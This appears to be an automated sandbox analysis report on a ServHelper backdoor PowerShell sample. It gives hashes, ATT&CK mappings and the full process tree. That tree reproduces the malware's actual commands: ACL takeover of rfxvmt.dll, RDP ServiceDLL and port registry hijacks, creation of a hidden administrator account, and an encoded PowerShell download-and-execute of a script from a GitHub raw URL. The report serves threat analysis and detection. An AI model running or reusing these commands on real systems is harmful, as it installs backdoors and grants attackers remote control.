Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/03/2025, 11:30
Static task
static1
Behavioral task
behavioral1
Sample
edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps1
Resource
win10v2004-20250217-en
General
-
Target
edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps1
-
Size
2.5MB
-
MD5
54ea05f72d85e81abc662f81717b3a6e
-
SHA1
10cc7c97b12808c6d0011d24a5213ce315b6ad0e
-
SHA256
edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa
-
SHA512
2b9fee3fd73c357345d61b3a642031cf38a1f4723ee377e318bb14f1a47954a7c229dc26da793cd3d6ab1ab5f565ed85aab402ca2047a7fd0e1f705944558290
-
SSDEEP
49152:cd8rheMFBvkc7Ti6PHckz0GepoCUnaw4Xmf7Em9sFqa:s
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Servhelper family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 404 net.exe 840 net1.exe 2576 cmd.exe 556 net.exe 2556 net1.exe 1240 cmd.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1088 powershell.exe 6 1088 powershell.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 2536 cmd.exe 1500 net.exe 2232 net1.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2696 icacls.exe 2900 icacls.exe 2684 icacls.exe 2984 icacls.exe 1960 icacls.exe 1248 icacls.exe 532 icacls.exe 2836 takeown.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Deletes itself 1 IoCs
pid Process 1804 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 2196 Process not Found 2196 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1248 icacls.exe 532 icacls.exe 2836 takeown.exe 2696 icacls.exe 2900 icacls.exe 2684 icacls.exe 2984 icacls.exe 1960 icacls.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
resource yara_rule behavioral1/files/0x000c000000016dea-52.dat upx behavioral1/files/0x0008000000017491-53.dat upx -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9Z4CTL00PXYP58O0CHAC.temp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
pid Process 1804 powershell.exe 1964 powershell.exe 2812 powershell.exe 2872 powershell.exe 1088 powershell.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1972 WMIC.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d089f85d0b94db01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 264 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1804 powershell.exe 1964 powershell.exe 2812 powershell.exe 2872 powershell.exe 1804 powershell.exe 1804 powershell.exe 1804 powershell.exe 1088 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 472 Process not Found 2196 Process not Found 2196 Process not Found 2196 Process not Found 2196 Process not Found 2196 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeRestorePrivilege 2900 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1972 WMIC.exe Token: SeIncreaseQuotaPrivilege 1972 WMIC.exe Token: SeAuditPrivilege 1972 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1972 WMIC.exe Token: SeIncreaseQuotaPrivilege 1972 WMIC.exe Token: SeAuditPrivilege 1972 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2132 WMIC.exe Token: SeIncreaseQuotaPrivilege 2132 WMIC.exe Token: SeAuditPrivilege 2132 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2132 WMIC.exe Token: SeIncreaseQuotaPrivilege 2132 WMIC.exe Token: SeAuditPrivilege 2132 WMIC.exe Token: SeDebugPrivilege 1088 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1804 wrote to memory of 1964 1804 powershell.exe 31 PID 1804 wrote to memory of 1964 1804 powershell.exe 31 PID 1804 wrote to memory of 1964 1804 powershell.exe 31 PID 1804 wrote to memory of 2812 1804 powershell.exe 33 PID 1804 wrote to memory of 2812 1804 powershell.exe 33 PID 1804 wrote to memory of 2812 1804 powershell.exe 33 PID 1804 wrote to memory of 2872 1804 powershell.exe 35 PID 1804 wrote to memory of 2872 1804 powershell.exe 35 PID 1804 wrote to memory of 2872 1804 powershell.exe 35 PID 1804 wrote to memory of 2836 1804 powershell.exe 39 PID 1804 wrote to memory of 2836 1804 powershell.exe 39 PID 1804 wrote to memory of 2836 1804 powershell.exe 39 PID 1804 wrote to memory of 2696 1804 powershell.exe 40 PID 1804 wrote to memory of 2696 1804 powershell.exe 40 PID 1804 wrote to memory of 2696 1804 powershell.exe 40 PID 1804 wrote to memory of 2900 1804 powershell.exe 41 PID 1804 wrote to memory of 2900 1804 powershell.exe 41 PID 1804 wrote to memory of 2900 1804 powershell.exe 41 PID 1804 wrote to memory of 2684 1804 powershell.exe 42 PID 1804 wrote to memory of 2684 1804 powershell.exe 42 PID 1804 wrote to memory of 2684 1804 powershell.exe 42 PID 1804 wrote to memory of 2984 1804 powershell.exe 43 PID 1804 wrote to memory of 2984 1804 powershell.exe 43 PID 1804 wrote to memory of 2984 1804 powershell.exe 43 PID 1804 wrote to memory of 1960 1804 powershell.exe 44 PID 1804 wrote to memory of 1960 1804 powershell.exe 44 PID 1804 wrote to memory of 1960 1804 powershell.exe 44 PID 1804 wrote to memory of 1248 1804 powershell.exe 45 PID 1804 wrote to memory of 1248 1804 powershell.exe 45 PID 1804 wrote to memory of 1248 1804 powershell.exe 45 PID 1804 wrote to memory of 532 1804 powershell.exe 46 PID 1804 wrote to memory of 532 1804 powershell.exe 46 PID 1804 wrote to memory of 532 1804 powershell.exe 46 PID 1804 wrote to memory of 1636 1804 powershell.exe 47 PID 1804 wrote to memory of 1636 1804 powershell.exe 47 PID 1804 wrote to memory of 1636 1804 powershell.exe 47 PID 1804 wrote to memory of 264 1804 powershell.exe 48 PID 1804 wrote to memory of 264 1804 powershell.exe 48 PID 1804 wrote to memory of 264 1804 powershell.exe 48 PID 1804 wrote to memory of 2888 1804 powershell.exe 49 PID 1804 wrote to memory of 2888 1804 powershell.exe 49 PID 1804 wrote to memory of 2888 1804 powershell.exe 49 PID 1804 wrote to memory of 1148 1804 powershell.exe 50 PID 1804 wrote to memory of 1148 1804 powershell.exe 50 PID 1804 wrote to memory of 1148 1804 powershell.exe 50 PID 1148 wrote to memory of 1108 1148 net.exe 51 PID 1148 wrote to memory of 1108 1148 net.exe 51 PID 1148 wrote to memory of 1108 1148 net.exe 51 PID 1804 wrote to memory of 1152 1804 powershell.exe 52 PID 1804 wrote to memory of 1152 1804 powershell.exe 52 PID 1804 wrote to memory of 1152 1804 powershell.exe 52 PID 1152 wrote to memory of 1660 1152 cmd.exe 53 PID 1152 wrote to memory of 1660 1152 cmd.exe 53 PID 1152 wrote to memory of 1660 1152 cmd.exe 53 PID 1660 wrote to memory of 1760 1660 cmd.exe 54 PID 1660 wrote to memory of 1760 1660 cmd.exe 54 PID 1660 wrote to memory of 1760 1660 cmd.exe 54 PID 1760 wrote to memory of 2636 1760 net.exe 55 PID 1760 wrote to memory of 2636 1760 net.exe 55 PID 1760 wrote to memory of 2636 1760 net.exe 55 PID 1804 wrote to memory of 1028 1804 powershell.exe 56 PID 1804 wrote to memory of 1028 1804 powershell.exe 56 PID 1804 wrote to memory of 1028 1804 powershell.exe 56 PID 1028 wrote to memory of 2324 1028 cmd.exe 57
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps11⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2836
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2696
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2684
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2984
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1248
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:532
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f2⤵PID:1636
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f2⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
PID:264
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f2⤵PID:2888
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:1108
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\cmd.execmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\net.exenet start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr5⤵PID:2636
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\cmd.execmd /c net start TermService3⤵PID:2324
-
C:\Windows\system32\net.exenet start TermService4⤵PID:1796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService5⤵PID:2316
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f2⤵PID:2756
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f2⤵PID:2804
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Indicator Removal: Network Share Connection Removal
PID:2536 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Indicator Removal: Network Share Connection Removal
PID:1500 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
- Indicator Removal: Network Share Connection Removal
PID:2232
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc idhevtne /add1⤵PID:2108
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc idhevtne /add2⤵PID:1864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc idhevtne /add3⤵PID:1044
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1240 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:404 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:840
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JSMURNPT$ /ADD1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2576 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JSMURNPT$ /ADD2⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JSMURNPT$ /ADD3⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2556
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1316
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1216
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc idhevtne1⤵PID:288
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc idhevtne2⤵PID:1356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc idhevtne3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2676
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2428
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1516
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Server Software Component
1Terminal Services DLL
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
1Network Share Connection Removal
1Modify Registry
1Discovery
Permission Groups Discovery
1Local Groups
1System Information Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50fd62120c475431ba83d8c0d677a4803
SHA17fc296d47748b80954d597bbccad31d941c049ff
SHA2566ed762a876b472b2e53300cec61d3fc254a63b99cd7cd7dbfa09d8c0c406c2ed
SHA512759b56cd25000daa49f29d520a24909582f94671be20e2a6dc0dfa719e5ea1a539240d98fc8590cedd8ba0e833d2b1213305907db75ae02f8fb3664d24392017
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
60KB
MD5db8de11b906843e62188d170711bddc3
SHA1427ed4be90b2117a702f9df67f2d7817ea919f79
SHA25690e9f4ffdb2ab1ef150c4bc411da031c9479bd8675901fb9726a959701cb6e4e
SHA512d4d1789ca1765df1a2c472a52f811c298ce3601658cf47a31ee3853dc0daef2964ed50101762c91c8525f5404adc86df718b531c67b0d7065566770fd5f77c45
-
Filesize
743KB
MD51227375b9491eeda0d50854a3dc592a3
SHA17ea8a29f5eb2d0639170a2d6b60eb5c8d304ed13
SHA256e67bfa2e36dc3e60ec7eedcc723a246ec4509abeb67c6a7961dcfe4f8405d317
SHA51268f1528573d5e57b55c7f91012a8f7849b8ef77029192975d25c24fa22180da7c172b1260990ae205e8da8e7752d57b69e7a28a500d35b282d81b6faf45b29b8